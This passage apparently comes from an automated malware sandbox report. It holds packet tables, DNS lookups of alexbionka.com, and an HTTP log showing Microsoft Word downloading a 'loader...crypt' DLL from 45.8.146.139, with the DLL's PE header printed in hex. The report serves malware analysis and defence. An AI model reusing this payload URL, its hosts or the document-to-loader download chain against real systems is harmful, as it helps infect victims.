                                                Aug 11, 2022 17:27:53.578011036 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578022957 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578028917 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578047037 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578061104 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578071117 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578088045 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578090906 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578095913 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578115940 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578119993 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578133106 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578142881 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578149080 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578166962 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578183889 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578187943 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578191042 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.578202009 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578219891 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578289986 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.578392982 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.680435896 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680464983 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680481911 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680499077 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680516005 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680532932 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680550098 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680566072 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.680613995 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.680634975 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.681828976 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681864977 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681885004 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681905985 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681917906 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.681930065 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681931973 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.681946993 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.681952000 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681966066 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.681976080 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.681982994 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682002068 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682012081 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682024956 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682034969 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682045937 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682068110 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682075024 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682089090 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682094097 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682111025 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682111025 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682115078 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682127953 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682135105 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682146072 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682159901 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682183027 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682184935 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682200909 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682209015 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682221889 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682233095 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682245016 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682255030 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682256937 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682265997 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682281971 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682292938 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682306051 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682320118 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682328939 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682346106 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682352066 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682369947 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682372093 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682378054 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682388067 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682400942 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682414055 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682425022 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682436943 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682447910 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682456970 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682472944 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682482958 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682497978 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682503939 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682521105 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682538033 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682543039 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682555914 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682569981 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682574987 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682599068 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682607889 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682610989 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682636023 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682650089 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682661057 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682668924 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682703972 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682715893 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682733059 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682744026 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682758093 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682760954 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682780981 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.682792902 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.682811022 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.783807993 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783840895 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783859015 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783870935 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783888102 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783905029 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783921957 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.783938885 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.784010887 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.785125017 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.785826921 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785856962 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785876036 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785893917 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785902023 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.785913944 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785929918 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785945892 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.785963058 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786026955 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786043882 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786058903 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786061049 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786077023 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786093950 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786108971 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786111116 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786128044 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786130905 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786145926 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786153078 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786161900 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786171913 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786180019 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786190987 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786207914 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786218882 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786236048 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786240101 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786254883 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786257029 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786273003 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786278009 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786290884 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786293030 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786308050 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786310911 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786324978 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786329031 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786340952 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786349058 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786358118 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786366940 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786375046 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786384106 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786391020 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786401987 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786407948 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786420107 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786425114 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786437035 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786442995 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786454916 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786458969 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786470890 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786474943 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786488056 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786492109 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786508083 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786508083 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786525011 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786526918 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786541939 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786545992 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786559105 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786562920 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786576033 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.786581039 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786601067 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.786619902 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.787009954 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.888993025 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889025927 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889043093 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889054060 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889070988 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889086962 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889101982 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889118910 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889136076 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889153004 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889168978 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889184952 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889200926 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889245033 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889261007 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889276981 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889295101 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889311075 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889321089 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.889328957 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889345884 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889354944 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.889362097 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889379025 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889395952 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889411926 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889448881 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889455080 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.889467001 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889482021 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889498949 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889516115 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889517069 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.889533043 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889549017 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889565945 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889581919 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889610052 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889626980 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889636993 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.889642000 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889658928 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889676094 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889693022 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889708042 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889725924 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889751911 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.889754057 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889761925 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889766932 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889780998 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889796972 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889811993 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889828920 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889844894 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889859915 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889872074 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889888048 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889903069 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889919996 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889935970 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889951944 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:53.889966011 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.890166998 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:53.891139030 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:27:58.583367109 CEST804917145.8.146.139192.168.2.22
                                                Aug 11, 2022 17:27:58.583476067 CEST4917180192.168.2.2245.8.146.139
                                                Aug 11, 2022 17:28:04.849479914 CEST4917280192.168.2.2264.227.108.27
                                                Aug 11, 2022 17:28:05.023319960 CEST804917264.227.108.27192.168.2.22
                                                Aug 11, 2022 17:28:05.023489952 CEST4917280192.168.2.2264.227.108.27
                                                Aug 11, 2022 17:28:05.028685093 CEST4917280192.168.2.2264.227.108.27
                                                Aug 11, 2022 17:28:05.202203989 CEST804917264.227.108.27192.168.2.22
                                                Aug 11, 2022 17:28:05.683288097 CEST804917264.227.108.27192.168.2.22
                                                Aug 11, 2022 17:28:05.878340960 CEST4917280192.168.2.2264.227.108.27
                                                Aug 11, 2022 17:28:06.655955076 CEST4917280192.168.2.2264.227.108.27
                                                Aug 11, 2022 17:29:13.851617098 CEST4917180192.168.2.2245.8.146.139

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 11, 2022 17:28:04.715267897 CEST5586853192.168.2.228.8.8.8
                                                Aug 11, 2022 17:28:04.732486010 CEST53558688.8.8.8192.168.2.22
                                                Aug 11, 2022 17:28:04.747967958 CEST4968853192.168.2.228.8.8.8
                                                Aug 11, 2022 17:28:04.775587082 CEST53496888.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 11, 2022 17:28:04.715267897 CEST192.168.2.228.8.8.80xd61cStandard query (0)alexbionka.comA (IP address)IN (0x0001)
                                                Aug 11, 2022 17:28:04.747967958 CEST192.168.2.228.8.8.80x6557Standard query (0)alexbionka.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 11, 2022 17:28:04.732486010 CEST8.8.8.8192.168.2.220xd61cNo error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
                                                Aug 11, 2022 17:28:04.775587082 CEST8.8.8.8192.168.2.220x6557No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • 45.8.146.139
                                                • alexbionka.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.224917145.8.146.13980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 17:27:53.142085075 CEST0OUTGET /fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 45.8.146.139
                                                Connection: Keep-Alive
                                                Aug 11, 2022 17:27:53.262594938 CEST2INHTTP/1.1 200 OK
                                                Date: Thu, 11 Aug 2022 15:27:53 GMT
                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                X-Powered-By: PHP/7.2.34
                                                Content-Description: File Transfer
                                                Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n152.dll"
                                                Expires: 0
                                                Cache-Control: must-revalidate
                                                Pragma: public
                                                Content-Length: 360448
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 12 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 07 00 0c 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U4ZZZYZYZZ3ZjXZRichZPEdYb" x`}.textwx `.rdata}|@@.rsrc~@@
